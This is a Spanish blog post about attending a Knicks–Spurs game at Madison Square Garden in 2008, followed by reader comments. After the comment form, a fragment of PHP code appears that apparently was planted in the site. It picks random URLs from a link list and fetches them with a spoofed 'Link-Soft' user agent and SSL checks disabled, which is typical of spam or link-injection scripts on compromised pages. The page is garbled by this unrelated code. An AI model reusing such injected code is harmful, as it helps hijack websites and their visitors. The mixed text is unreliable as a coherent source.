El final de la cuenta atrás… Let´s Go Knicks!!!

24 de February de 2008 por Jabho

Cuando antes de verlo imaginaba cómo sería el Madison Square Garden pensaba en el pabellón del equipo de baloncesto con el mayor mercado del mundo, un gran recinto deportivo, inmenso y espectacular, con el emblema de los Knicks por todas partes.

Lo descubro apenas media hora después de llegar a New York, el tiempo justo para dejar las maletas en el hotel y situarme con un mapa. Faltan poco más de 3 horas y media para el partido que enfrenta a los locales contra los vigentes campeones, los Spurs, y me acerco por la 8ª Avenida mirando boquiabierto unos edificios que en pocos días dejarán de llamarme la atención, porque ahora me parecen inmensos y pronto serán “unos más” del todo a lo grande que es en sí misma la Gran Manzana.

Y es grande el Madison, aunque mucho menos espectacular de lo esperado. Ocupa una manzana entera entre la 7ª y la 8ª avenidas y entre las calles 33 y 34. Pero comparte espacio con una estación de tren, Penn Station, y un edificio inmenso que, supongo, serán oficinas. Anuncian un próximo concierto de Juanes, la llegada de los Harlem Glober Trotters y algunos eventos más que nada tienen que ver con el baloncesto o la NBA. Enfrente, por el lado de la 8ª Avenida, y mucho más bonito que el propio Madison, está el edificio central del servicio Postal en New York.

Así que con tan poca expectación empieza a desaparecer la preocupación que tenía sobre si habrá o no entradas. Asumo que habrá y me sitúo en la única cola donde pone el letrero de Today´s Only. Error fatal, cuando llega mi turno, con mi mal inglés y la amabilidad de la persona que me atiende (confirmaré que salvo excepciones es verdad eso de que los estadounidenses son muy amables, al menos con los turistas), descubro que sólo quedan unas pocas entradas disponibles, cheapest 45$ y que las siguientes entradas ya cuestan 200$… No tenía intención de comprar los asientos más baratos en la parte superior del estadio, pero 200$ por entrada escapa a mi presupuesto así que no me queda más remedio que comprar las localidades baratas y confiar en que se vea bien el partido. “Mierda, debí arriesgarme y reservar por Internet”.

Para hacer un poco de tiempo doy un paseo por la ciudad y ceno un poco de pizza. A falta de una hora para el partido empiezo a notar un ligero cosquilleo (¿nervios?) y me voy para el campo. Como si estuviera dentro de una película en una esquina del Madison me compro un perrito “con todo” de esos en los que el pepinillo, el ketchup y la mostaza no dejan ver la salchicha…

Cuando llego a mi asiento lo primero que compruebo es que se ve bien. Menos mal. Luego, como harán muchos otros después, me acerco a la barandilla más cercana para hacerme una foto con el Madison de fondo. Los equipos calientan, periodistas en mitad de la pista haciendo entrevistas, aficionados entrando, algunos argentinos con banderas esperan a Manu y Oberto, y por fin llegan las presentaciones. El público ignora algunas de las presentaciones Spur pero no la de Bowen, al que silban y abuchean, ni la de Duncan, al que reconocen con aplausos. Con el estadio a oscuras, los focos guiándolos y los aplausos de su público, salen los jugadores de los Knicks. Empieza el espectáculo. No es que no lo esperara pero sorprende, con algo de envidia, ver como las 20.000 personas nos levantábamos y en respetuoso silencio se cantaba el himno estadounidense.

La primera parte del partido huele a decepción. Los Knicks se van al descanso ganando por 16 puntos empujados por un gran Fred Jones que ha hecho 4 triples y 15 puntos. Los Spurs andan en mitad de su Rodeo Road Trip, la gira anual que hace el equipo tejano mientras en su pabellón se disputa un campeonato de rodeo. Durante esta gira San Antonio estará 17 días fuera de casa, disputará 9 partidos y recorrerá más de 10.000 kilómetros. Y todo esto, sin Tony Parker, lesionado. Temo que los Spurs estén cansados y hoy no haya partido.

A falta de partido, hay espectáculo. A las palomitas, nachos, cervezas y algodón dulce con un sombrero Knick que te van ofreciendo durante el partido, se han unido las cheerleaders e incluso una pareja que se han prometido en un tiempo muerto. Pienso que si le pido matrimonio a mi chica durante un partido y con todo el estadio mirándonos a través del vídeo-marcador lo más probable es que cuando llegue a casa pille. Y no en el buen sentido.

La segunda parte arranca y Manu va metiendo a los Spurs en el partido. Los Knicks aguantan pero la distancia se va recortando. Cuando quedan un par de segundos para acabar el tercer cuarto se juega la última posesión, quién si no, Horry… clin, clin, caja. Este tipo ha nacido para anotar estos tiros. Sólo 3 arriba los Knicks. En el arranque del último cuarto el tipo de los 7 anillos, jugón, con dos triples más adelanta a los Spurs. Tiempo muerto de los Knicks. El final de la cuenta atrás.

En una ciudad donde los Yankees son una religión y los Giants un motivo de orgullo puede parecer que los Knicks son el patito feo. Parece, pero sólo lo parece. Porque si algo descubriré en los días siguientes es que en cada esquina de la ciudad donde cabe hay una canasta de baloncesto. New York está lleno de playgrounds donde hay, además de los columpios para los niños, tantas canastas como quepan.

Así que durante el tiempo muerto, y acompañados por los acordes de The Final Countdown, las cámaras enfocan a un tipo que se levanta y enseña, orgulloso, su anillo en el dedo. No sé su nombre pero deduzco que es un jugador de los New York Giants, que la semana pasada acaban de ganar la final de la SuperBowl. El público se pone en pie y le rinde homenaje. Los jugadores, sobre todo los locales, también. A mí se me ha puesto “la carne de gallina”.

Falta casi un cuarto de partido y los 20.000 que estamos en el campo ya no nos sentaremos hasta que acabe ese cuarto. El vídeo-marcador nos guía: defense! bajo los acordes de Stars Wars cuando sale Darth Vader y atacan los Spurs, Let´s Go Knicks! y la carga de la caballería cuando atacan los Knicks, Make Noise! en los tiros libres Spurs, Make More Noise!!!! (¿más? Pero si no oigo ni mis pensamientos) en algunos ataques Spurs….

Sostenidos por su gente, que puesta en pie no para de animar, los Knicks se aferran al talento de Crawford y la garra de Lee y Balkman para volver a ponerse por delante y aguantar las embestidas Spurs. Y aguantan mucho. Más de lo que yo esperaba. Aguantan hasta que a falta de unas décimas en un fallo infantil en defensa de Balkman, Finley lleva el partido a la prórroga.

Con ese tiro de Finley el partido se acaba. Falta una prórroga, es cierto, pero algunos se van y los que nos quedamos no damos un duro por los Knicks. No nos equivocamos. Los Knicks no anotarán hasta que falte medio minuto para acabar y el partido esté resuelto. Con o sin gira, los Spurs son mucho Spurs y les han pasado por encima. Pero los Knicks han peleado y han vendido cara su derrota. Y eso debe ser motivo de orgullo para una afición que no recibe muchas alegrías últimamente.

Por mi parte, llevo más de 20 horas despierto, he hecho un largo viaje y me doy cuenta de que estoy cansado. Cansado y contento porque he cumplido un sueño.

 

Comenta

9 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Gran articulo Julio ¡¡¡¡¡

      Citar

  2. Dantley dice:
    #2

    Nos has metido en el partido ¡¡¡

    Gran artículo, no nombras al gran Chandler, pero sigue siendo bueno.

      Citar

  3. MagicJohnson32 dice:
    #3

    Vi el partido, así que me siento aún más metido en el partido, jaja. La jugada del triple de Finley fue para fusilar a todos los Knicks, por burros. Estaba claro que ganaban los Spurs después de eso.

    En fin, no sé cuándo pero yo iré a NY, e iré a ver NBA.

    Gran artículo, Julio.

      Citar

  4. xapa_croack dice:
    #4

    Viste el partido magic de los NY??? pero ese dia hacian el Lakers-Magic en cuatro??

      Citar

  5. MagicJohnson32 dice:
    #5

    Claro, precisamente por eso lo vi, que si no de qué me voy a quedar a ver un Knicks-Spurs, jeje.

    Tenía puestos los dos partidos.

      Citar

  6. RusticoColorao dice:
    #6

    Joder que grande Julio!!!!!!!! Muy buen artículo…a ver si algún dís los demás también podemos ver un partido en directo.

    Magic…eres un vicioso tío

      Citar

  7. Olafur dice:
    #7

    Tremendo Julio!!!, oye al final lo de los donuts como quedó? jojojojo

      Citar

  8. MagicJohnson32 dice:
    #8

    Rústico, yo soy un vicioso, pero éste no es lugar para hablar de sexo ¬¬

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    El chaval de gafas de las fotos tiene pinta de ojeador.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>